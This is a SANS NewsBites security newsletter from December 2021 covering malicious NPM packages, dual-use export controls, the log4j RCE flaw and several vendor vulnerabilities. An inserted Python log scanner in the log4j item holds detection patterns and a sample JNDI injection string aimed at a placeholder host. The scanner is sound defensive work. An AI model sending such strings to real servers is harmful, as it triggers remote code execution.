SANS NewsBites

Risk of Malicious NPM Packages Increases; US to Look at Export Controls as Means to Limit Malicious Use of “Dual Use Technology”; Apache log4j Zero Day Flaw Requires Immediate Workaround and Log Checking

December 10, 2021  |  Volume XXIII - Issue #96

Top of the News


2021-12-09

More Malicious NPM Packages

Malicious NPM libraries found in an open source repository appear to have been created to steal Discord access tokens and take control of infected systems. The libraries have been taken down.

Editor's Note

In the 2021 SANS New Threats and Attacks report, Ed Skoudis highlighted “dependency confusion” attacks as part of the overall software supply chain security issue. Like everything related to supply chain security, there are multiple areas that must be addressed – package manager configuration, software asset inventory, file integrity management, in addition to nascent efforts at having accurate and meaningful Software Bills of Material.

John Pescatore

NPM is not the only repository being hit with malicious package versions; the PyPI (Python) and RubyGems (Ruby) repositories have also been hit. Make sure that your CI process includes only vetted versions of packages, then check to make sure none of your vetted versions are listed as compromised.

Lee Neely

2021-12-09

US Expected to Introduce Malicious Cyber Tool Export Restriction Initiative

The Biden administration is expected to announce an initiative that will impose restrictions on the export of technology that could be used to conduct malicious cyber activity. The Export Control and Human Rights Initiative grew out of sanctions that have been imposed on NSO Group and other organizations that make technologies that are used to violate human rights.

Editor's Note

Current expectations are that this will be some sort of “non-binding code of conduct,” so not yet worth a lot of angst about the unintended negative consequences of export controls on “dual use technologies” related to security. But (skewing old here) in 1995, the SATAN vulnerability scanning tool built by Dan Farmer and Wietse Venema was decried as being something bad guys would use to find vulnerabilities that would lead to them attacking good guys. Over time (along with other examples such as encryption and pen test tools) experience has shown that making it easier for better security tools to be in the hands of skilled defenders is more effective than making it harder for anyone (including bad guys) to obtain/use such tools.

John Pescatore

Restricting the use of technology intended to violate human rights is a good thing. This initiative should align us with similar restrictions in the UK and elsewhere. Great caution must be exercised with restrictions on dual-use technology. Regulation can rapidly make cyber research as illegal as malicious exploitation.

Lee Neely

2021-12-09

RCE Vulnerability in log4j Java Logging Package

A vulnerability in log4j could be exploited to allow remote code execution. Maintained by the Apache project, log4j is a popular library used to implement logging. The library supports many projects written in Java, including multiple cloud services and various open-source and commercial enterprise products. As an example, an attacker could include the exploit string as a user agent in an HTTP request. If the web application logs the user agent string using log4j, log4j can be tricked into connecting to the attacker’s server and downloading additional code that will be executed by the service. The vulnerability has been assigned CVE-2021-44228.
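The "log checking" this flaw calls for, as an added example (Python, not from the newsletter or the Apache project): a small scanner over constructed web-server access-log lines that flags log4j lookup syntax in attacker-controlled request fields. The field names, severity labels and the sample lines are my own assumptions; "example.invalid" is a reserved placeholder host.

```python
import re

# Combined log format: host ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Any log4j-style lookup: "${", a lookup name, a colon, then a closing "}".
# Matching only the literal "jndi" token is too narrow, so any lookup syntax
# in an attacker-controlled field is treated as suspicious; a "jndi" lookup,
# the vector the advisory describes, is rated critical.
LOOKUP_RE = re.compile(r'\$\{[^}]*:[^}]*\}')
JNDI_RE = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)


def classify(line):
    """Return None for a clean line, else (severity, field, matched_text)."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        # Unparsable lines are surfaced rather than silently skipped.
        return ("unparsed", "line", line.strip())
    for field in ("request", "referer", "agent"):
        value = m.group(field)
        hit = LOOKUP_RE.search(value)
        if hit:
            severity = "critical" if JNDI_RE.search(value) else "suspicious"
            return (severity, field, hit.group(0))
    return None


def scan(lines):
    """Scan an iterable of log lines; return (line_no, severity, field, text) per hit."""
    return [(i + 1, *c) for i, line in enumerate(lines) if (c := classify(line))]


# Constructed sample access-log lines (not real traffic). The second carries a
# JNDI lookup in the User-Agent; the third carries a non-JNDI lookup in the path.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://example.invalid/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:00:03 +0000] "GET /?q=${env:HOME} HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for lineno, severity, field, text in scan(SAMPLE_LOG):
        print(f"line {lineno}: {severity} lookup in {field}: {text}")
```

Point `scan()` at the lines of a real access log to get the same tuples; lines that fail to parse come back labelled "unparsed" so a format mismatch is visible instead of hiding hits.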

Editor's Note

The importance of this vulnerability cannot be overstated. Past log4j vulnerabilities have been actively exploited for years, and vendors like Oracle continue to patch these past vulnerabilities in their products. Luckily there is a configuration workaround that you may consider to mitigate this vulnerability. Do so now, as the exploit is trivial and has been made public.

Johannes Ullrich

This is a case for continuous in-house pentesting for organizations large enough to support it. Apache Log4j is one of those web application plumbing components that many companies won't know they're using - much like Apache Struts 2. In fact, if you're running Struts 2, you're likely running a vulnerable version of Log4j. Further, much like Struts vulnerabilities, it's the kind of flaw that generally needs to be checked actively and won't come up in typical vulnerability scans.

Christopher Elgee

The Rest of the Week's News


2021-12-07

Cyber Incident Reporting Requirements Removed from FY 2022 NDAA

The most recent version of the fiscal year 2022 US National Defense Authorization Act (NDAA) no longer includes language that would have imposed mandatory cyber incident reporting. Earlier versions of the NDAA included a provision that would have directed the Cybersecurity and Infrastructure Security Agency (CISA) to establish an incident reporting process for critical infrastructure operators.

Editor's Note

Beyond mandatory reporting, voluntary reporting is still an option and will help the CISA tune their response efforts. Regardless of reporting, working with the CISA and your sector ISAC will give you access to peers, best practices, assessments, and incident response help and expertise.

Lee Neely

2021-12-09

NIST to Solicit Input on Supply Chain Security Guidance

In early 2022, the US National Institute of Standards and Technology (NIST) will seek input to update its Cybersecurity Framework to include guidance for supply chain security issues. The request for information (RFI) will also likely seek ways to make the Cybersecurity Framework more consistent with other NIST cybersecurity guidance documents.

Editor's Note

NIST is expected to issue guidance on software security best practices in early February, 270 days after EO 14028 was issued; seize the opportunity to provide real-world input into this guidance. NIST will also be operating pilot programs, based on this guidance, which report out in May.

Lee Neely

Three paragraphs in, this article has a line that starts with “While the agency has been studying the topic (for) years, …” and I stopped reading there.

John Pescatore

The reports seem to suggest that NIST is focused on "advice to small business," the segment least well equipped to do anything to address malicious code shipped to them by suppliers. We must hold suppliers accountable for malicious code that they ship.

William Hugh Murray

2021-12-07

Eltima SDK Vulnerability Affects Cloud Services

Researchers from SentinelOne have detected a privilege elevation vulnerability in Eltima’s software development kit (SDK) for virtual networking. The library is used by multiple cloud services for USB over Ethernet capability. Vendors have made updates available.

Editor's Note

This vulnerability affects products like Amazon Workspaces that offer "Desktops in the Cloud." To connect USB devices like cameras to these cloud systems, the Eltima SDK provides USB access over IP networks. The advisory lists some of the vulnerable products, but there are likely more.

Johannes Ullrich

Amazon released updates in July, while other cloud providers released updates in September and October. Make sure your cloud provider has implemented the updated USB over Ethernet drivers if they are using Eltima’s packages. The update requires client and service changes; read your cloud service provider’s guidance. AWS AutoStop WorkSpaces with maintenance turned on, or AlwaysOn WorkSpaces with OS updates turned on, will be updated; otherwise manual steps are needed. Scan to make sure the desktop clients are running the latest versions.

Lee Neely

2021-12-08

SonicWall VPN Appliance Vulnerabilities

SonicWall is urging customers to patch SMA 100 series appliances to address at least eight security issues. Among the most serious vulnerabilities is an unauthenticated stack-based buffer overflow flaw that could be exploited to take control of vulnerable devices.

Editor's Note

There are no mitigations for this one; you need to update the firmware. Note this is the SMA 100 series – which includes the SMA 200, 201, 400, 410 and 500v appliances. As these appliances are providing firewall and remote access (boundary protection) services, prioritize updating them, particularly as remote access vulnerabilities have been a focus for threat actors.

Lee Neely

2021-12-09

Cisco Warns of Apache HTTP Server Vulnerabilities That Affect Cisco Products

Cisco has updated a November 24 advisory about vulnerabilities in Apache HTTP Server to include additional information about products under investigation, vulnerable products, and products confirmed not vulnerable. The flaws were initially disclosed in September.

Editor's Note

Exploits include an unauthenticated remote attacker being able to leverage mod_proxy to forward requests to an arbitrary server. The Cisco advisory lists the vulnerable products, some of which do not yet have fixes. Read the product specific bug advisory for mitigations or workarounds.

Lee Neely

2021-12-09

MikroTik Routers Vulnerable to Attacks

According to researchers from Eclypsium, up to 300,000 MikroTik routers are vulnerable to exploits that could harness their resources to be used in a botnet. The flaws have been known for more than a year.

Editor's Note

MikroTik routers are very capable and powerful devices, but they lack the management features enterprise equipment has, which makes it difficult to maintain them. Targeting more "Prosumers" and "Enthusiasts", these devices are more capable than the average home/SMB router, but they do show the same weaknesses as the smaller devices. This makes them an interesting target for attackers looking for platforms to build botnets or mine cryptocoins.

Johannes Ullrich

Make sure that you’re changing default credentials, enabling auto-update of firmware, and disabling remote access to the management interface. Also make sure that you’re checking them for vulnerabilities or threats. The Eclypsium report includes links for a free tool which can check this for you.

Lee Neely

2021-12-08

“Prolific” Canadian Cybercriminal Charged

Canadian and US officials have jointly charged Matthew Philbert with fraud and conspiracy in connection with multiple ransomware attacks. Philbert has been described as “the most prolific cybercriminal … identified in Canada.” The attacks targeted individuals, private companies, and government organizations in the US and Canada.

Editor's Note

Many of these attacks were targeted at small businesses less likely to have a robust security program and leveraged email with malicious attachments. “Use caution with attachments, particularly from unknown sources” has to be more than a slogan on a sign or implemented in training; make sure your users internalize it. Most cloud based email services offer security services to screen and/or block malicious attachments and senders; make sure that you’re enabling these services to help reduce the likelihood of a user choosing badly. The cost difference of these services, if any, is far less than recovery from ransomware or another incident.

Lee Neely

Internet Storm Center Tech Corner

December 2021 Forensic Challenge

https://isc.sans.edu/forums/diary/December+2021+Forensic+Challenge/28108/


Webshells, Webshells everywhere!

https://isc.sans.edu/forums/diary/Webshells+Webshells+everywhere/28106/


Phishing Direct Messages via Discord

https://isc.sans.edu/forums/diary/Phishing+Direct+Messages+via+Discord/28114/


log4j RCE 0-day

https://www.lunasec.io/docs/blog/log4j-zero-day/


Misconfigured Kafdrop Puts Companies' Apache Kafka Completely Exposed

https://spectralops.io/blog/misconfigured-kafdrop-puts-companies-apache-kafka-completely-exposed/


Microsoft and GitHub OAuth Implementation Vulnerabilities Lead to Redirection Attacks

https://www.proofpoint.com/us/blog/cloud-security/microsoft-and-github-oauth-implementation-vulnerabilities-lead-redirection


Sonicwall SMA 100 Patch

https://www.sonicwall.com/support/product-notification/product-security-notice-sma-100-series-vulnerability-patches-q4-2021/211201154715443/


Vulnerable MikroTik Routers

https://eclypsium.com/2021/12/09/when-honey-bees-become-murder-hornets/


Android Patch Day

https://source.android.com/security/bulletin/2021-12-01?hl=en


AWS Outage

https://status.aws.amazon.com


Windows 10 RCE: The exploit is in the link

https://positive.security/blog/ms-officecmd-rce


XSinator.com: From a Formal Model to the Automatic Evaluation of Cross-Site Leaks in Web Browsers

https://xsinator.com/paper.pdf